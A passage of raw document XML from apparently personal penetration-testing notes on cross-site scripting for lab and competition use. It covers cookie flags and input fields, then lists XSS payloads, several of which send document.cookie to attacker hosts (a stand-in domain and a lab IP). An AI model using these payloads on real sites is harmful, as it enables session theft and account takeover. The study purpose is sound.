      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:hyperlink r:id="rId931">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId932">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Secure</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag instructs the browser to only send the cookie over encrypted connections, such as HTTPS. This protects the cookie from being sent in clear text and captured over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:hyperlink r:id="rId933">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId934">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HttpOnly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag instructs the browser to deny JavaScript access to the cookie. If this flag is not set, we can use an XSS payload to steal the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's verify the nature of WordPress' session cookies by first logging in as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we can open the Web Developer Tools, navigate to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab, then click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://offsecwp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> under the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> menu on the left.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 29: Inspecting WordPress Cookies" id="268" name="image270.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 29: Inspecting WordPress Cookies" id="0" name="image270.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId935"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 29: Inspecting WordPress Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We notice that our browser has stored six different cookies, but only four are session cookies. Of these four cookies, if we exclude the negligible </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wordpress_test_cookie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, all support the HttpOnly feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since all the session cookies can be sent only via HTTP, unfortunately, they also cannot be retrieved via JavaScript through our attack vector. We'll need to find a new angle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B74">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B75">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B76">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify Input Fields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Locate areas where user input is accepted, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search bars</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment sections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies or HTTP headers (advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject Basic XSS Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B80">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS: Once you find one that works, you have to find a way to get the payload to trigger when someone else looks at the page. Like if you put it in the comments or user profile, then when they look, the payload will trigger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B81">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B82">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS: This one is often when you find a URL parameter that is vulnerable, and then you share that link with others. Often not the solution for HTB, but it is a valid vulnerability in CPTC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B83">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with simple scripts to see if they are reflected in the response without sanitization:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Test different tags if scripts are filtered:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="x" onerror="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="x" onerror="fetch('http://your-attack-server.com/log?cookies=' + document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to steal a cookie using the img method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;svg onload="alert('XSS')"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Script Image method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;var i=new Image(); i.src="http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.14.41:5000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/?cookie="+btoa(document.cookie); &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Headless HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the IP and PORT with your own IP and port, or the web hook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B90">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From CPTC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=1 onerror=fetch("attacker-domain",{method:'POST',mode:'no-cors',body:document.cookie}); /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one uses a POST request as well as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no-cors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode to bypass cross-origin restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B93">
